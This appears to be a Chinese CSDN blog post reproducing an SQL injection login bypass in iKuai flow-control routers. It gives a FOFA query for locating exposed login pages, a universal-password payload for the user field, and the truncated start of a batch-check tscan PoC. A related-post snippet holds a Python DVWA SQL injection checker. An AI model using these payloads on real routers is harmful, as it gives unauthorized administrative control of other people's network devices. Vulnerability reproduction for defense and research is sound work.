iKuai 流控路由 SQL注入漏洞(含批量验证poc)

已于 2024-04-06 21:42:23 修改
阅读量193 收藏
点赞数
分类专栏: 漏洞复现 文章标签: sql 安全 web安全
于 2024-04-06 21:42:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137439171
版权

漏洞描述

iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限

漏洞影响

iKuai 流控路由

FOFA关键字

title=”登录爱快流控路由”

漏洞复现

登录页面如下

使用万能密码登录后台

user: "or""=""or""="
pass: 空

tscan poc编写

params: []
name: ikuai-router-sql
set: {}
rules:
- method: POST
  path: /login/x
  headers: {}
  body: user="or""="&#
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
iKuai 流控路由 SQL注入漏洞
nnn2188185的博客
03-22 2658
iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限
iKuai 流控路由 SQL注入漏洞批量验证poc)(1),2024年最新2024网络安全最新大厂面试真题
2401_83621004的博客
04-17 505
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。title=”登录爱快流控路由iKuai 流控路由
iKuai 流控路由 SQL注入漏洞批量验证poc),三年经验月薪50k我是怎么做到的
2401_83621095的博客
04-17 292
title=”登录爱快流控路由”使用万能密码登录后台。
路由漏洞复现_看了之后每个人都是黑客
m0_67742636的博客
06-20 750
渗透测试,网络安全路由安全
任意文件读取下载漏洞
weixin_48712514的博客
05-19 1533
1. 任意文件读取 一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 1:敏感信息泄露 2:目录穿越,目录穿透,目录遍历 任意文件读取与下载漏洞原理 1:从权限的角度来讲,读取与下载都是属于读权限 漏洞成因 不管是任意文件读取还是任意文件下载,触发漏洞的条件都是相同的 1:存在读取文件的函数(web应用开放了读取功能) 2:读取文件的路径客户端可控(完全控制) 3:没有对文件路
瑞友天翼2024SQL注入漏洞poc
02-27
瑞友天翼2024SQL注入漏洞poc
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS身份认证绕过漏洞批量检测poc.7z
使用VMware虚拟机通过Panabit抓取爱快虚拟机PPPoE报文
gsls200808的专栏
12-16 1853
上一篇文章提到使用VMware虚拟机搭建爱快路由器PPPoE服务器环境,这篇文章继续上一篇文章的环境抓取其中的PPPoE。 1.安装Panabit并修改网卡配置 安装过程不多说,安装后配置成透明网桥模式,可以参考之前的文章。这里主要是修改其中的配置。 新建LAN区段 pppoe交换机2,Panabit外网接LAN区段 pppoe交换机,win7原来接LAN区段 pppoe交换机的改成接LAN区段 pppoe交换机2。 最终网段配置如下 爱快 Panabit win7虚拟机 ...
BUU UPLOAD COURSE 1 文件包(1)
2401_84240189的博客
05-16 313
eval函数是没办法直接执行命令的,它是把字符串当作php代码解析。它是代码执行函数。因为这里不是直接上传php文件,无法用蚁剑直接连接,只能用hackbar输入命令。system函数是php的函数,用来执行系统命令。它是命令执行函数网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)需要这份系统化资料的朋友,可以点击这里获取。
读文读报1——上线提权抓取明文密码
soldi_er的博客
04-13 2266
文章目录总结读文读报扩展阅读参考 总结 读文读报   “Shodan插件探测到81-83端口”   疑问:使用81-83端口的常见服务有哪些?   据说:81端口通常是路由器管理页面端口,或汉邦登录界面端口。 Fofa搜索 搜索命令 访问URL 判断 port=“81” 中国 xx:81/doc/page/login.asp 页面信息Hikvision,海康威视摄像头,admin/12345 region=“Zhejiang” && port=“81” xx:81 jhu
步步为营——局域网调试NAS软路由“PVE+爱快+lede+黑群晖硬盘直通”并移植到宽带网(超详细,上篇)
热门推荐
zengqi_91的博客
04-21 1万+
步步为营——局域网调试PVE+爱快+lede+黑群晖硬盘直通并移植到宽带网软硬件准备PVE、爱快、lede(opwrt)、黑群晖等的IP、网关和DNS规划安装配置PVE+爱快+lede+黑群晖安装配置PVE安装配置“爱快”(ikuai)安装配置lede-openwrt安装配置黑群晖正确关机命令行操作虚拟机移植到宽带网 最近小白我迷上了软路由NAS,“度娘”随便查了下相关资料,竟然惊人一致的要求CP...
【vpn异地组网专题】爱快ikuai路由-VM虚拟机安装教程
中国程序猿
09-06 1万+
一、ikuai路由器简述 官方介绍 二、ikuai路由器虚拟机安装教程 1、 下载ikuai-os 下载地址 点击官方下载地址可看到有几种类型的系统文件,安装到虚拟机时建议下载ISO文件 注:根据自己的虚拟机宿机配置选择合适的配置,如上图,可查看32/64位机的配置要求,这里我选用的是32位,对内存要求较低。 2、安装到虚拟机 1)VMware--> 文件-->新建虚拟机-->典型 2) 3) 4)下面单击自定义硬件 5)虚拟...
Flink Sql-用户自定义 Sources & Sinks
最新发布
bigdatakenan的博客
06-13 810
在许多情况下,开发人员不需要从头开始创建新的连接器,而是希望稍微修改现有的连接器或 hook 到现有的 stack。在其他情况下,开发人员希望创建专门的连接器。本节对这两种用例都有帮助。它解释了表连接器的一般体系结构,从 API 中的纯粹声明到在集群上执行的运行时代码实心箭头展示了在转换过程中对象如何从一个阶段到下一个阶段转换为其他对象。
编写一个能够验证dvwasql注入漏洞poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_injection_vulnerability(url): payload = "' OR '1'='1' -- " response = requests.get(url + "?id=" + payload) if "Error" in response.text: print("该网站存在 SQL 注入漏洞!") else: print("该网站不存在 SQL 注入漏洞。") # 在这里替换为你的 DVWA 网站的 URL dvwa_url = "http://example.com/dvwa/vulnerabilities/sqli/" check_sql_injection_vulnerability(dvwa_url) ``` 请确保替换 `dvwa_url` 变量为你自己的 DVWA 网站的 URL,然后运行代码。如果输出显示该网站存在 SQL 注入漏洞,则说明你的 DVWA 配置存在问题,需要进行修复。 请记住,这只是一个简单的示例,实际的 SQL 注入漏洞检测可能需要更复杂的测试方法和技术。在进行任何安全测试之前,请确保遵守法律和道德准则,并获得适当的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值